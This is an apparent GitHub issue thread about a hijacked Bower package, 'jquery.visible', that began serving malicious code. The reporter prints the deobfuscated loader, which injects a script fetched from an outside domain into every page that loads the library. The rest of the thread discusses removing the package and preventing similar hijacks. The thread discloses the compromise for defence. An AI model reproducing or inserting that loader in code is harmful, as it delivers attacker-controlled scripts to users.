Malicious Package: Replaced Previous Valid Package

[grok]

Helloooo

Not sure how this happened. But, we dusted off a project, and did bower install.

The bower.json file looked like this:

{
  "name": "some-project-name",
  "private": true,
  "dependencies": {
    "velocity": "latest",
    "slick.js": "~1.3.11",
    "jScrollPane": "~2.0.14",
    "jquery-smartresize": "*",
    "pickadate": "~3.5.4",
    "moment": "~2.8.3",
    "heapbox": "~0.9.4",
    "jstorage": "~0.4.12",
    "jquery.visible": "~1.1.0",
    "responsive-tabs": "~1.4.0",
    "vimeo-player-js": "^1.0.6",
    "picturefill": "^3.0.2"
  }

It kept failing. Kept saying this:

bower jquery.visible#~1.1.0 ENORESTARGET No tag found that was able to satisfy ~1.1.0

So, we changed it to latest. That installed fine. Unfortunately... it installed very obviously hacked library.

Here's a copy of the code: https://gist.github.com/grok/ee3e9337d0f5ca41797eb3841ef4da29

This, once you pull it apart, looks like this:

if (typeof window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 === 'undefined') {
    window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 = function() {
        var a = document.getElementsByTagName('head')[0];
        var b = document.createElement('script');
        b.type = 'text/javascript';
        b.src = '//s3-cdn.com/github/get-raw.js';
        a.appendChild(b)
    };
    getJs_f2c1ce8f7abf1928c1e5e9780adf9613()
}

You can follow the rabbit hole from there.

Regardless. Here are things we know:

1. This used to work.
2. It no longer works.
3. If you search for it on bower.io -- and search for "jquery.visible" you will find it.
4. The URL points to https://github.com/teamdf/jquery-visible which no longer exists.
5. But regardless of that URL no longer existing, it's serving malicious code.

Recommended action: kill it with fire.

[benmann]

cc: @sheerun

[grok]

Also for what it's worth: https://webcache.googleusercontent.com/search?q=cache:c4r4ofSJIcMJ:https://github.com/teamdf/jquery-visible/wiki+&cd=5&hl=en&ct=clnk&gl=us

[grok]

My current theory here is, their GitHub was compromised. Then deleted, and Bower cached the last hash and here we are.

[sheerun]

@grok This has nothing to do with Bower caching, github serves 404 on https://github.com/teamdf/jquery-visible but git clone https://github.com/teamdf/jquery-visible works and downloads malicious code. I suggest you raise this issue to their support.

As for the Bower, the best I can do is to remove this package from registry

[sheerun]

I agree that maybe their GitHub were compromised. But also it's possible they just changed their username and GitHub allowed someone else to register under the same name and create this repository. It's a vulnerability if you ask me.

[grok]

Thanks @sheerun -- as long as you guys are aware, see what happened and feel comfortable, I'll close this out.

It should still probably be pulled off of bower.

I'll follow up with GitHub then.

[sheerun]

I don't feel comfortable but I cannot tell what else we could do to prevent it.

Thank you for noticing us, please let us know what GitHub responds.

[grok]

Talking with another engineer about it @aradnom -- it would be interesting to consider bower warning someone if they are pulling down a "dead" package... though I have no idea what steps could be taken to ensure that it is in fact dead.

[sheerun]

I have no idea as well

[sheerun]

btw. If you used Yarn, it locks versions and does sha checksums as well so it would be non-issue

[grok]

Good idea! I'll talk to my team about that.

[sheerun]

@grok I'd also consider notifying domain name registrar where the malicious code is hosted: http://s3-cdn.com/github/get-raw.js

whois says the registrar is https://www.evoplus.com

[grok]

That's a domain protection company. Called, got a VM, gave up. I went a step further and found the original author of that repository on Twitter and sent them to this issue: https://twitter.com/SterLo/status/821799243857981440

[sheerun]

@grok I've unregistered this package and put a placeholder

[sheerun]

I'd like to find all such packages but it's too much cloning ;(

[grok]

I hear you! I know it's not a Bower problem, this is more of a Publisher and GitHub problem. It was just a wake-up call to my team and such that we need to be more vigilant in what is installed by package managers and then what gets compiled into the applications.